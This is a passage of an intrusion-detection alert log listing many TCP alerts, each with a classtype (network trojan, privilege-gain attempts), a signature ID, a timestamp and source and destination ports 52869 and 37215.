                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.495508
                      SID:2025132
                      Source Port:44590
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.040812
                      SID:2835222
                      Source Port:60340
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:09.891414
                      SID:2025132
                      Source Port:34962
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.978835
                      SID:2025132
                      Source Port:40016
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.486502
                      SID:2027339
                      Source Port:55102
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.619598
                      SID:2027339
                      Source Port:43258
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.634372
                      SID:2835222
                      Source Port:59606
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.498619
                      SID:2027339
                      Source Port:56578
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.110964
                      SID:2025132
                      Source Port:60932
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:34.048825
                      SID:2835222
                      Source Port:53792
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:09.021221
                      SID:2027339
                      Source Port:47164
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.298541
                      SID:2027339
                      Source Port:39444
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.128003
                      SID:2831300
                      Source Port:50218
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:51.875785
                      SID:2027339
                      Source Port:59312
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.370646
                      SID:2027339
                      Source Port:36080
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.331820
                      SID:2027339
                      Source Port:39354
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.624224
                      SID:2027339
                      Source Port:54392
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.924852
                      SID:2831300
                      Source Port:52002
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.343266
                      SID:2025132
                      Source Port:54936
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.885895
                      SID:2835222
                      Source Port:55438
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.448947
                      SID:2025132
                      Source Port:41332
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.042815
                      SID:2025132
                      Source Port:56826
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.131339
                      SID:2829579
                      Source Port:57472
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.556804
                      SID:2027339
                      Source Port:57658
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.611773
                      SID:2027339
                      Source Port:54474
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.654172
                      SID:2835222
                      Source Port:36212
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.177552
                      SID:2027339
                      Source Port:58512
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.971751
                      SID:2831300
                      Source Port:39120
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:57.747300
                      SID:2025132
                      Source Port:57584
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.877747
                      SID:2835222
                      Source Port:50868
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.919383
                      SID:2831300
                      Source Port:55932
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:46.348899
                      SID:2831300
                      Source Port:53338
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:49.946258
                      SID:2025132
                      Source Port:42936
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:03.958922
                      SID:2027339
                      Source Port:60076
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.950737
                      SID:2831300
                      Source Port:51886
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:24.943244
                      SID:2829579
                      Source Port:55978
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.978983
                      SID:2831300
                      Source Port:57384
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:52.006906
                      SID:2027339
                      Source Port:50982
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.660997
                      SID:2027339
                      Source Port:53996
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.058922
                      SID:2835222
                      Source Port:56668
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:10.666264
                      SID:2025132
                      Source Port:41658
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:06.991143
                      SID:2835222
                      Source Port:39806
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.698859
                      SID:2025132
                      Source Port:43246
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:56.353592
                      SID:2027339
                      Source Port:39768
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.354788
                      SID:2027339
                      Source Port:32794
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.713195
                      SID:2027339
                      Source Port:47504
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:32.034562
                      SID:2835222
                      Source Port:60676
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.330552
                      SID:2831300
                      Source Port:41256
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:20.591485
                      SID:2831300
                      Source Port:52570
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:56.504220
                      SID:2027339
                      Source Port:58452
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.795218
                      SID:2025132
                      Source Port:38366
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.929013
                      SID:2835222
                      Source Port:36600
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.521019
                      SID:2831300
                      Source Port:34432
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:46.439367
                      SID:2831300
                      Source Port:44908
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:24.510301
                      SID:2027339
                      Source Port:41918
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.175742
                      SID:2835222
                      Source Port:37622
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.455724
                      SID:2027339
                      Source Port:60998
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.192511
                      SID:2025132
                      Source Port:58484
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:51.790169
                      SID:2027339
                      Source Port:37528
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.124696
                      SID:2829579
                      Source Port:53234
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.883172
                      SID:2835222
                      Source Port:36552
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.323043
                      SID:2027339
                      Source Port:59916
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.167711
                      SID:2025132
                      Source Port:39028
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:49.901282
                      SID:2025132
                      Source Port:54834
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.578116
                      SID:2831300
                      Source Port:34374
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:40.321300
                      SID:2829579
                      Source Port:55554
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.350602
                      SID:2027339
                      Source Port:36276
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.315740
                      SID:2027339
                      Source Port:58126
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.719313
                      SID:2027339
                      Source Port:58424
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.432937
                      SID:2027339
                      Source Port:58602
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.470704
                      SID:2025132
                      Source Port:45810
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:40.285039
                      SID:2829579
                      Source Port:44938
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.936545
                      SID:2829579
                      Source Port:60996
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.674845
                      SID:2027339
                      Source Port:44134
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:32.027082
                      SID:2829579
                      Source Port:39308
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.159648
                      SID:2831300
                      Source Port:47212
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:51.213578
                      SID:2831300
                      Source Port:41160
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.721582
                      SID:2027339
                      Source Port:40048
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.926465
                      SID:2027339
                      Source Port:35840
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.284488
                      SID:2835222
                      Source Port:60452
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.161614
                      SID:2829579
                      Source Port:45192
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.912088
                      SID:2831300
                      Source Port:34906
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:27.656128
                      SID:2835222
                      Source Port:52098
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.530676
                      SID:2831300
                      Source Port:50316
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:55.797133
                      SID:2025132
                      Source Port:55262
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.131339
                      SID:2835222
                      Source Port:50504
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.996056
                      SID:2829579
                      Source Port:59582
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.938949
                      SID:2027339
                      Source Port:51090
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.334452
                      SID:2829579
                      Source Port:56216
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.993925
                      SID:2025132
                      Source Port:36958
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:01.357047
                      SID:2025132
                      Source Port:49068
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.510114
                      SID:2025132
                      Source Port:49522
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:10.977084
                      SID:2025132
                      Source Port:60170
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:11.635828
                      SID:2835222
                      Source Port:41410
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.976795
                      SID:2829579
                      Source Port:57148
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.191389
                      SID:2835222
                      Source Port:57408
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.169212
                      SID:2025132
                      Source Port:57438
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.589820
                      SID:2027339
                      Source Port:41334
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.645186
                      SID:2829579
                      Source Port:53540
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.312083
                      SID:2027339
                      Source Port:57364
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:03.085082
                      SID:2027339
                      Source Port:48622
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.355606
                      SID:2027339
                      Source Port:46546
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.302154
                      SID:2027339
                      Source Port:52690
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.608574
                      SID:2025132
                      Source Port:50646
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:51.833558
                      SID:2025132
                      Source Port:34832
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.593003
                      SID:2831300
                      Source Port:49616
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.620788
                      SID:2027339
                      Source Port:49576
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:10.069241
                      SID:2027339
                      Source Port:58652
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.965131
                      SID:2027339
                      Source Port:41790
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.055673
                      SID:2831300
                      Source Port:34800
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:59.148145
                      SID:2829579
                      Source Port:55784
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.524925
                      SID:2025132
                      Source Port:56392
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:18.278764
                      SID:2027339
                      Source Port:56808
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:48.156942
                      SID:2025132
                      Source Port:41054
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.752424
                      SID:2025132
                      Source Port:52414
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.939520
                      SID:2025132
                      Source Port:50552
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:48.083998
                      SID:2025132
                      Source Port:36126
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:52.380418
                      SID:2027339
                      Source Port:35076
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.111381
                      SID:2835222
                      Source Port:35496
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:30.172034
                      SID:2831300
                      Source Port:38216
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:59.194576
                      SID:2835222
                      Source Port:37398
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.886284
                      SID:2829579
                      Source Port:59416
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.610546
                      SID:2027339
                      Source Port:47288
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.328066
                      SID:2831300
                      Source Port:56348
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:40.301143
                      SID:2829579
                      Source Port:40256
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:07.236630
                      SID:2027339
                      Source Port:37638
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.116780
                      SID:2027339
                      Source Port:34822
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.022763
                      SID:2829579
                      Source Port:44248
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.131564
                      SID:2025132
                      Source Port:40240
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:48.447183
                      SID:2027339
                      Source Port:45040
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.821906
                      SID:2025132
                      Source Port:51208
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.541928
                      SID:2025132
                      Source Port:34978
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.574571
                      SID:2027339
                      Source Port:49190
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:26.420170
                      SID:2027339
                      Source Port:44598
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.915268
                      SID:2835222
                      Source Port:42714
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.206219
                      SID:2027339
                      Source Port:54166
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:06.453402
                      SID:2027339
                      Source Port:34724
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.214052
                      SID:2831300
                      Source Port:49210
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:02.570955
                      SID:2025132
                      Source Port:60414
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.116897
                      SID:2831300
                      Source Port:38352
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.615260
                      SID:2027339
                      Source Port:52816
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.631134
                      SID:2835222
                      Source Port:33872
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.758824
                      SID:2027339
                      Source Port:45004
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.280820
                      SID:2027339
                      Source Port:37874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.642551
                      SID:2027339
                      Source Port:44568
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.567236
                      SID:2027339
                      Source Port:59368
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.158709
                      SID:2027339
                      Source Port:33618
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.695259
                      SID:2027339
                      Source Port:53234
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.872971
                      SID:2025132
                      Source Port:35896
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:07.016889
                      SID:2835222
                      Source Port:46684
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.567513
                      SID:2027339
                      Source Port:35712
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.664887
                      SID:2829579
                      Source Port:51748
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.943792
                      SID:2025132
                      Source Port:41816
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:01.526784
                      SID:2027339
                      Source Port:48998
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.702517
                      SID:2025132
                      Source Port:42148
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.365783
                      SID:2831300
                      Source Port:60722
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:54.787983
                      SID:2027339
                      Source Port:41556
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.137101
                      SID:2027339
                      Source Port:60448
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.053604
                      SID:2835222
                      Source Port:37496
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.978141
                      SID:2835222
                      Source Port:55614
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:12.248256
                      SID:2025132
                      Source Port:58000
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:34.048825
                      SID:2829579
                      Source Port:46924
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.745085
                      SID:2027339
                      Source Port:47378
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.199406
                      SID:2025132
                      Source Port:43286
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.229799
                      SID:2025132
                      Source Port:59514
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:34.044417
                      SID:2829579
                      Source Port:38864
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.318262
                      SID:2025132
                      Source Port:57020
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.985320
                      SID:2027339
                      Source Port:52730
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.949637
                      SID:2025132
                      Source Port:55394
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:56.091033
                      SID:2027339
                      Source Port:55710
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.428891
                      SID:2831300
                      Source Port:52146
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:46.556921
                      SID:2027339
                      Source Port:56592
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.854348
                      SID:2025132
                      Source Port:42622
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.885849
                      SID:2835222
                      Source Port:40988
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.066373
                      SID:2829579
                      Source Port:60054
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.536863
                      SID:2027339
                      Source Port:48960
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.046616
                      SID:2829579
                      Source Port:60340
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.350108
                      SID:2027339
                      Source Port:34098
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.951298
                      SID:2835222
                      Source Port:55046
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:00.234228
                      SID:2027339
                      Source Port:50240
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
